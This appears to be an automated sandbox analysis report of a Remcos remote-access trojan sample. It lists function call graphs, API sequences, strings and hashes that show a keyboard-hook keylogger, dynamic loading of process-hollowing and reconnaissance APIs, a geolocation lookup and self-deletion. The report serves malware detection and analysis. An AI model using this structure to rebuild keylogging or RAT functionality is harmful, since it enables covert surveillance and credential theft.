26 API calls _Deallocate 59917->59932 59926 104acc EnterCriticalSection 59919->59926 59921 fa9e7 59927 faa88 59921->59927 59924 fa9c2 __wsopen_s 59926->59921 59929 faa96 59927->59929 59928 fa9f2 59933 faa0f LeaveCriticalSection std::_Lockit::~_Lockit 59928->59933 59929->59928 59934 108416 39 API calls 2 library calls 59929->59934 59931->59917 59932->59924 59933->59924 59934->59929 59935 d4dba 59950 da51b 59935->59950 59937 d4dc3 59938 c1fbd 28 API calls 59937->59938 59939 d4dd2 59938->59939 59940 c4468 60 API calls 59939->59940 59941 d4dde 59940->59941 59942 d61f2 59941->59942 59943 c1eea 26 API calls 59941->59943 59944 c1d8c 26 API calls 59942->59944 59943->59942 59945 d61fb 59944->59945 59946 c1eea 26 API calls 59945->59946 59947 d6207 59946->59947 59948 c1eea 26 API calls 59947->59948 59949 d6213 59948->59949 59951 da529 59950->59951 59952 fa88c ___crtLCMapStringA 21 API calls 59951->59952 59953 da533 InternetOpenW InternetOpenUrlW 59952->59953 59954 da55c InternetReadFile 59953->59954 59957 da57f 59954->59957 59955 c1f86 28 API calls 59955->59957 59956 da5ac InternetCloseHandle InternetCloseHandle 59958 da5be 59956->59958 59957->59954 59957->59955 59957->59956 59959 c1eea 26 API calls 59957->59959 59958->59937 59959->59957 59960 c99d0 59963 c9a97 59960->59963 59962 c99e1 59964 c9ab4 59963->59964 59965 c9af7 CallNextHookEx 59963->59965 59966 c9abf 59964->59966 59967 c9ae0 59964->59967 59965->59962 59968 c9ac4 59966->59968 59969 c9ad2 59966->59969 59976 ca931 59967->59976 59968->59965 60033 cad56 38 API calls 59968->60033 60034 cadb0 30 API calls 59969->60034 59972 c9ad0 59972->59965 59977 ca940 59976->59977 59978 c1f66 28 API calls 59977->59978 59979 c9aec 59977->59979 59980 cabcd 59978->59980 59979->59965 59982 cabfd 59979->59982 60035 c9d33 29 API calls 59980->60035 59983 cac17 59982->59983 59984 cad40 59982->59984 59985 cac1d 59983->59985 59986 cac9b 59983->59986 60036 c9b10 59984->60036 59992 c1f66 28 API calls 59985->59992 60027 cad3e 59985->60027 59989 c1f66 28 API calls 59986->59989 59991 caca9 59989->59991 59993 c1f66 28 API calls 59991->59993 59994 cac4a 59992->59994 59995 cacb7 59993->59995 60046 fe7eb 46 API calls 59994->60046 59997 dae08 28 API calls 59995->59997 59999 caccc 59997->59999 59998 cac53 60000 c1f66 28 API calls 59998->60000 60049 cae1e 31 API calls 59999->60049 60003 cac63 60000->60003 60002 cacda 60004 dae08 28 API calls 60002->60004 60047 c85fd 28 API calls 60003->60047 60006 cace8 60004->60006 60050 c2860 28 API calls 60006->60050 60007 cac6e 60008 c275c 28 API calls 60007->60008 60010 cac78 60008->60010 60048 c9d33 29 API calls 60010->60048 60011 cacf3 60051 c2860 28 API calls 60011->60051 60014 cac80 60016 c1eea 26 API calls 60014->60016 60015 cacfd 60052 c9d58 27 API calls 60015->60052 60018 cac89 60016->60018 60020 c1eea 26 API calls 60018->60020 60019 cad05 60021 c1e13 26 API calls 60019->60021 60022 cac92 60020->60022 60023 cad0e 60021->60023 60025 c1eea 26 API calls 60022->60025 60024 c1e13 26 API calls 60023->60024 60026 cad17 60024->60026 60025->60027 60028 c1e13 26 API calls 60026->60028 60027->59965 60029 cad20 60028->60029 60030 c1e13 26 API calls 60029->60030 60031 cad2c 60030->60031 60032 c1eea 26 API calls 60031->60032 60032->60022 60033->59972 60034->59972 60035->59979 60037 f6050 ___scrt_fastfail 60036->60037 60038 c9b31 6 API calls 60037->60038 60039 c9bf8 60038->60039 60042 c9b91 ___scrt_fastfail 60038->60042 60040 c9c08 ToUnicodeEx 60039->60040 60040->60040 60041 c9bef 60040->60041 60043 c3b40 28 API calls 60041->60043 60042->60041 60045 c9bc6 ToUnicodeEx 60042->60045 60044 c9c37 60043->60044 60053 c9d58 27 API calls 60044->60053 60045->60041 60046->59998 60047->60007 60048->60014 60049->60002 60050->60011 60051->60015 60052->60019 60053->60027

                                              Executed Functions

                                              Function 000DBCE3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,000CD783), ref: 000DBCF8
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBD01
                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,000CD783), ref: 000DBD18
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBD1B
                                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,000CD783), ref: 000DBD2D
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBD30
                                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,000CD783), ref: 000DBD41
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBD44
                                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,000CD783), ref: 000DBD55
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBD58
                                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,000CD783), ref: 000DBD65
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBD68
                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,000CD783), ref: 000DBD75
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBD78
                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,000CD783), ref: 000DBD85
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBD88
                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,000CD783), ref: 000DBD99
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBD9C
                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,000CD783), ref: 000DBDA9
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBDAC
                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,000CD783), ref: 000DBDBD
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBDC0
                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,000CD783), ref: 000DBDD1
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBDD4
                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,000CD783), ref: 000DBDE5
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBDE8
                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,000CD783), ref: 000DBDF5
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBDF8
                                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,000CD783), ref: 000DBE06
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBE09
                                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,000CD783), ref: 000DBE16
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBE19
                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,000CD783), ref: 000DBE2B
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBE2E
                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,000CD783), ref: 000DBE3B
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBE3E
                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,000CD783), ref: 000DBE50
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBE53
                                              • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,000CD783), ref: 000DBE60
                                              • GetProcAddress.KERNEL32(00000000), ref: 000DBE63
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$HandleLibraryLoadModule
                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                              • API String ID: 384173800-625181639
                                              • Opcode ID: 1bbe12ad37947d2097d0e1cc8250cc63e9dc3093b4d67c3307cb33f98836a023
                                              • Instruction ID: 5160d92abca2dc4e6371a84568060d908a3f201288ff6429fe812456f4b0c8dd
                                              • Opcode Fuzzy Hash: 1bbe12ad37947d2097d0e1cc8250cc63e9dc3093b4d67c3307cb33f98836a023
                                              • Instruction Fuzzy Hash: B3310EA0E4833C7ADB207BB67D89C5BBF9CDB44B943020816B514D3695DB78E9508EA8
                                              Function 000C99E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1300 c99e4-c99fd 1301 c99ff-c9a19 GetModuleHandleA SetWindowsHookExA 1300->1301 1302 c9a63-c9a73 KiUserCallbackDispatcher 1300->1302 1301->1302 1303 c9a1b-c9a61 GetLastError call dad46 call c4c9e call c1f66 call da686 call c1eea 1301->1303 1304 c9a8f 1302->1304 1305 c9a75-c9a8d TranslateMessage DispatchMessageA 1302->1305 1306 c9a91-c9a96 1303->1306 1304->1306 1305->1302 1305->1304
                                              APIs
                                              • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 000C9A01
                                              • SetWindowsHookExA.USER32(0000000D,000C99D0,00000000), ref: 000C9A0F
                                              • GetLastError.KERNEL32 ref: 000C9A1B
                                                • Part of subcall function 000DA686: GetLocalTime.KERNEL32(00000000), ref: 000DA6A0
                                              • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 000C9A6B
                                              • TranslateMessage.USER32(?), ref: 000C9A7A
                                              • DispatchMessageA.USER32(?), ref: 000C9A85
                                              Strings
                                              • Keylogger initialization failure: error , xrefs: 000C9A32
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Message$CallbackDispatchDispatcherErrorHandleHookLastLocalModuleTimeTranslateUserWindows
                                              • String ID: Keylogger initialization failure: error
                                              • API String ID: 941179788-952744263
                                              • Opcode ID: 94ac9d52fc7590e60a4c318227c7d1406dc5e3fd7aebb3c7f29d3b5373c49f4a
                                              • Instruction ID: 6ef24012235586b8eaf9e75ad45f1fccd2cc31fad214a0f249e4c0fdc9b7825d
                                              • Opcode Fuzzy Hash: 94ac9d52fc7590e60a4c318227c7d1406dc5e3fd7aebb3c7f29d3b5373c49f4a
                                              • Instruction Fuzzy Hash: CF118F31614201ABC720AB799D4AEAFB7FCAB95710B00452EF855C2691EB30DA41C7A2
                                              Function 000C9B10 Relevance: 12.1, APIs: 8, Instructions: 108keyboardthreadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1317 c9b10-c9b8f call f6050 GetForegroundWindow GetWindowThreadProcessId GetKeyboardLayout GetKeyState GetKeyboardState ToUnicodeEx 1320 c9bf8-c9c04 1317->1320 1321 c9b91-c9b98 1317->1321 1322 c9c08-c9c24 ToUnicodeEx 1320->1322 1323 c9b9a-c9beb call fe349 call f6050 ToUnicodeEx 1321->1323 1324 c9bf2-c9bf6 1321->1324 1322->1322 1325 c9c26 1322->1325 1327 c9bef-c9bf0 1323->1327 1324->1327 1328 c9c2b-c9c48 call c3b40 1325->1328 1327->1328
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,001340F8), ref: 000C9B3F
                                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 000C9B4B
                                              • GetKeyboardLayout.USER32(00000000), ref: 000C9B52
                                              • GetKeyState.USER32(00000010), ref: 000C9B5C
                                              • GetKeyboardState.USER32(?,?,001340F8), ref: 000C9B67
                                              • ToUnicodeEx.USER32(0013414C,?,?,?,00000010,00000000,00000000), ref: 000C9B8A
                                              • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 000C9BE3
                                              • ToUnicodeEx.USER32(0013414C,?,?,?,00000010,00000000,00000000), ref: 000C9C1C
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                              • String ID:
                                              • API String ID: 1888522110-0
                                              • Opcode ID: 6a40a4b952c0cac58917c1d15004477e94d992fea902d4898d50070eb4ede7b2
                                              • Instruction ID: 4c4c382217481aa77326d27cf531546c5a7bdbd2b6d96f99860b99170e50db9f
                                              • Opcode Fuzzy Hash: 6a40a4b952c0cac58917c1d15004477e94d992fea902d4898d50070eb4ede7b2
                                              • Instruction Fuzzy Hash: 24319272554308BFD710DF90DC89FDBB7EDFB48710F00482AB641D65A1E7B1A9889BA2
                                              Function 000DA51B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68networkfileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1334 da51b-da55a call c1faa call fa88c InternetOpenW InternetOpenUrlW 1339 da55c-da57d InternetReadFile 1334->1339 1340 da57f-da59f call c1f86 call c2f08 call c1eea 1339->1340 1341 da5a3-da5a6 1339->1341 1340->1341 1343 da5ac-da5c8 InternetCloseHandle * 2 call fa887 1341->1343 1344 da5a8-da5aa 1341->1344 1344->1339 1344->1343
                                              APIs
                                              • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 000DA53E
                                              • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 000DA554
                                              • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 000DA56D
                                              • InternetCloseHandle.WININET(00000000), ref: 000DA5B3
                                              • InternetCloseHandle.WININET(00000000), ref: 000DA5B6
                                              Strings
                                              • http://geoplugin.net/json.gp, xrefs: 000DA54E
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Internet$CloseHandleOpen$FileRead
                                              • String ID: http://geoplugin.net/json.gp
                                              • API String ID: 3121278467-91888290
                                              • Opcode ID: 7eb5a8a1f5fb46059ed59372fc2668348bd7b0d7a2482f1432f5f834b94c3437
                                              • Instruction ID: f8811c7e64e3d09003dc3a37eb63ab8827c3161a286051d9ba60273a229fb77c
                                              • Opcode Fuzzy Hash: 7eb5a8a1f5fb46059ed59372fc2668348bd7b0d7a2482f1432f5f834b94c3437
                                              • Instruction Fuzzy Hash: 4711C1712093226BD228AB25AC45EFF7FECEF86360F00053DF90592682CB549849C6B2
                                              Function 000CE54F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 000D24B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 000D24D7
                                                • Part of subcall function 000D24B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,001342F8), ref: 000D24F5
                                                • Part of subcall function 000D24B7: RegCloseKey.KERNEL32(?), ref: 000D2500
                                              • Sleep.KERNEL32(00000BB8), ref: 000CE603
                                              • ExitProcess.KERNEL32 ref: 000CE672
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseExitOpenProcessQuerySleepValue
                                              • String ID: 5.3.0 Pro$override$pth_unenc
                                              • API String ID: 2281282204-531312966
                                              • Opcode ID: ae9f5c6abb370942d0b0ab00d9ca59a5e3e42c335395fdc8d0ee15c891e9fe38
                                              • Instruction ID: 541cabf0c023ec20f07fde73aecaf5a88950cf1440b7c6a157567f2bbcf5cfdc
                                              • Opcode Fuzzy Hash: ae9f5c6abb370942d0b0ab00d9ca59a5e3e42c335395fdc8d0ee15c891e9fe38
                                              • Instruction Fuzzy Hash: 1321D032B0435067D6187B79A91BFEF3AAA9B92714F80401DF805973C7EE65CA1183E7
                                              Function 000DA7A2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetComputerNameExW.KERNEL32(00000001,?,0000002B,00134358), ref: 000DA7BF
                                              • GetUserNameW.ADVAPI32(?,000CDFC3), ref: 000DA7D7
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Name$ComputerUser
                                              • String ID:
                                              • API String ID: 4229901323-0
                                              • Opcode ID: dd485898407b737f094cbac73ffd2d3db8805d523e1c01f5b5b45779b633eb8e
                                              • Instruction ID: ebd3bfa906449274f3f3c2bab12a0a31cdc10880f5ba7aef1af3186223cb481f
                                              • Opcode Fuzzy Hash: dd485898407b737f094cbac73ffd2d3db8805d523e1c01f5b5b45779b633eb8e
                                              • Instruction Fuzzy Hash: 8801FB7290011CABDB14EB90DC45EDDB7BCAF44314F10416AB402F2196EFB0AB898BA4
                                              Function 000CE679 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,000D45AD,00133EE8,00134A10,00133EE8,00000000,00133EE8,?,00133EE8,5.3.0 Pro), ref: 000CE68D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: InfoLocale
                                              • String ID:
                                              • API String ID: 2299586839-0
                                              • Opcode ID: 1d1a2b0a75d561032471fe5bc9b5de4897cf56f9424089968727b0e272401bb6
                                              • Instruction ID: 3b9ac085c6a81a00b24acf9b4e9019af85110884cfe45db3ca5321bde3193e88
                                              • Opcode Fuzzy Hash: 1d1a2b0a75d561032471fe5bc9b5de4897cf56f9424089968727b0e272401bb6
                                              • Instruction Fuzzy Hash: DDD05E70700218BBEA149381CD0AFDE7AACE702B61F000165BA01D72C1E9A0AF0086E1
                                              Function 000CD767 Relevance: 46.3, APIs: 13, Strings: 13, Instructions: 799COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 5 cd767-cd7e9 call dbce3 GetModuleFileNameW call ce168 call c1fbd * 2 call dafc3 call ce8bd call c1d8c call fe820 22 cd7eb-cd830 call ce986 call c1d64 call c1e8f call cfcba call ce937 call ce155 5->22 23 cd835-cd8fd call c1d64 call c1e8f call c1d64 call c4cbf call c5ce6 call c1eef call c1eea * 2 call c1d64 call c1ebd call c541d call c1d64 call c4bb1 call c1d64 call c4bb1 5->23 48 cdc96-cdca7 call c1eea 22->48 69 cd8ff-cd94a call c85b4 call c1eef call c1eea call c1e8f call d24b7 23->69 70 cd950-cd96b call c1d64 call cb125 23->70 69->70 102 ce134-ce154 call c1e8f call d2902 call d12b5 69->102 80 cd96d-cd98c call c1e8f call d24b7 70->80 81 cd9a5-cd9ac call cbed7 70->81 80->81 98 cd98e-cd9a4 call c1e8f call d2902 80->98 90 cd9ae-cd9b0 81->90 91 cd9b5-cd9bc 81->91 94 cdc95 90->94 95 cd9be 91->95 96 cd9c0-cd9cc call da463 91->96 94->48 95->96 103 cd9ce-cd9d0 96->103 104 cd9d5-cd9d9 96->104 98->81 103->104 107 cda18-cda2b call c1d64 call c1e8f 104->107 108 cd9db call c697b 104->108 128 cda2d call c69ba 107->128 129 cda32-cdaba call c1d64 call dae08 call c1e18 call c1e13 call c1d64 call c1e8f call c1d64 call c1e8f call c1d64 call c1e8f call c1d64 call c1e8f 107->129 117 cd9e0-cd9e2 108->117 120 cd9ee-cda01 call c1d64 call c1e8f 117->120 121 cd9e4-cd9e9 call c699d call c64d0 117->121 120->107 138 cda03-cda09 120->138 121->120 128->129 163 cdabc-cdad5 call c1d64 call c1e8f call fa611 129->163 164 cdb22-cdb26 129->164 138->107 140 cda0b-cda11 138->140 140->107 142 cda13 call c64d0 140->142 142->107 163->164 191 cdad7-cdb1d call c1d64 call c1e8f call c1d64 call c1e8f call cc89e call c1e18 call c1e13 163->191 166 cdb2c-cdb33 164->166 167 cdcaa-cdd01 call f6050 call c22f8 call c1e8f * 2 call d265d call c82d7 164->167 170 cdb35-cdbaf call c1d64 call c1e8f call c1d64 call c1e8f call c1d64 call c1e8f call c1d64 call c1e8f call c1d64 call c1e8f call cbc67 166->170 171 cdbb1-cdbbb call c82d7 166->171 222 cdd06-cdd5c call c1d64 call c1e8f call c1f66 call c1e8f call d26d2 call c1d64 call c1e8f call fa5e7 167->222 178 cdbc0-cdbe4 call c22f8 call f38c8 170->178 171->178 199 cdbe6-cdbf1 call f6050 178->199 200 cdbf3 178->200 191->164 202 cdbf5-cdc40 call c1e07 call fe349 call c22f8 call c1e8f call c22f8 call c1e8f call d28a2 199->202 200->202 259 cdc45-cdc6a call f38d1 call c1d64 call cb125 202->259 272 cdd5e 222->272 273 cdd79-cdd7b 222->273 259->222 274 cdc70-cdc91 call c1d64 call dae08 call ce219 259->274 275 cdd60-cdd77 call dbeb0 CreateThread 272->275 276 cdd7d-cdd7f 273->276 277 cdd81 273->277 274->222 292 cdc93 274->292 280 cdd87-cde66 call c1f66 * 2 call da686 call c1d64 call c1e8f call c1d64 call c1e8f call c1d64 call c1e8f call fa5e7 call c1d64 call c1e8f call c1d64 call c1e8f call c1d64 call c1e8f call c1d64 call c1e8f StrToIntA call c9517 call c1d64 call c1e8f 275->280 276->275 277->280 330 cde68-cde9f call f360d call c1d64 call c1e8f CreateThread 280->330 331 cdea1 280->331 292->94 333 cdea3-cdebb call c1d64 call c1e8f 330->333 331->333 343 cdebd-cdef4 call f360d call c1d64 call c1e8f CreateThread 333->343 344 cdef9-cdf0c call c1d64 call c1e8f 333->344 343->344 354 cdf6c-cdf7f call c1d64 call c1e8f 344->354 355 cdf0e-cdf67 call c1d64 call c1e8f call c1d64 call c1e8f call cc854 call c1e18 call c1e13 CreateThread 344->355 366 cdfba-cdfde call da7a2 call c1e18 call c1e13 354->366 367 cdf81-cdfb5 call c1d64 call c1e8f call c1d64 call c1e8f call fa5e7 call cb95c 354->367 355->354 386 cdfe0-cdfe1 SetProcessDEPPolicy 366->386 387 cdfe3-cdff6 CreateThread 366->387 367->366 386->387 390 cdff8-ce002 CreateThread 387->390 391 ce004-ce00b 387->391 390->391 394 ce00d-ce017 CreateThread 391->394 395 ce019-ce020 391->395 394->395 398 ce022-ce025 395->398 399 ce033-ce038 395->399 401 ce027-ce031 398->401 402 ce073-ce08e call c1e8f call d246e 398->402 404 ce03d-ce06e call c1f66 call c4c9e call c1f66 call da686 call c1eea 399->404 401->404 414 ce12a-ce12f call ccbac call d3fd4 402->414 415 ce094-ce0d4 call dae08 call c1e07 call d2584 call c1e13 call c1e07 402->415 404->402 414->102 433 ce0ed-ce0f2 DeleteFileW 415->433 434 ce0f4-ce125 call dae08 call c1e07 call d297a call c1e13 * 2 433->434 435 ce0d6-ce0d9 433->435 434->414 435->434 436 ce0db-ce0e8 Sleep call c1e07 435->436 436->433
                                              APIs
                                                • Part of subcall function 000DBCE3: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,000CD783), ref: 000DBCF8
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD01
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,000CD783), ref: 000DBD18
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD1B
                                                • Part of subcall function 000DBCE3: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,000CD783), ref: 000DBD2D
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD30
                                                • Part of subcall function 000DBCE3: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,000CD783), ref: 000DBD41
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD44
                                                • Part of subcall function 000DBCE3: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,000CD783), ref: 000DBD55
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD58
                                                • Part of subcall function 000DBCE3: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,000CD783), ref: 000DBD65
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD68
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,000CD783), ref: 000DBD75
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD78
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,000CD783), ref: 000DBD85
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD88
                                                • Part of subcall function 000DBCE3: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,000CD783), ref: 000DBD99
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBD9C
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,000CD783), ref: 000DBDA9
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBDAC
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,000CD783), ref: 000DBDBD
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBDC0
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,000CD783), ref: 000DBDD1
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBDD4
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,000CD783), ref: 000DBDE5
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBDE8
                                                • Part of subcall function 000DBCE3: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,000CD783), ref: 000DBDF5
                                                • Part of subcall function 000DBCE3: GetProcAddress.KERNEL32(00000000), ref: 000DBDF8
                                                • Part of subcall function 000DBCE3: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,000CD783), ref: 000DBE06
                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4wECQoBvYC.exe,00000104), ref: 000CD790
                                                • Part of subcall function 000CFCBA: __EH_prolog.LIBCMT ref: 000CFCBF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3270022231.00000000000C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000C0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_c0000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                              • String ID: Access Level: $Administrator$C:\Users\user\Desktop\4wECQoBvYC.exe$Exe$Inj$Remcos Agent initialized$Software\$User$del$del$exepath$licence$license_code.txt
                                              • API String ID: 2830904901-2321554654
                                              • Opcode ID: 36638de06427716a24db0cb957e4a779490de377208d40f4aa829fedd5536de4
                                              • Instruction ID: 96bd5cba1f6f8e489f5fcfed6f7659c68d6b581bc0330908dcb4cb67b2e3798c
                                              • Opcode Fuzzy Hash: 36638de06427716a24db0cb957e4a779490de377208d40f4aa829fedd5536de4
                                              • Instruction Fuzzy Hash: 3032C771B043906BEB18B7749C57FFE269A9F93700F04486EB942AB2C3DF649D458362
